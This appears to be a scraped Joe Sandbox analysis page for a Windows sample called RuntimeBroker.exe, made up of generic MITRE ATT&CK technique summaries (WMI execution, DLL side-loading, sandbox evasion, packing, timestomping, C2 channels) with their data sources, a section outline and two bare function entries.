Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report RuntimeBroker.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Windows Analysis Report
RuntimeBroker.exe

Function 058411C8 Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 611
memoryCOMMON

Function 0584EF80 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON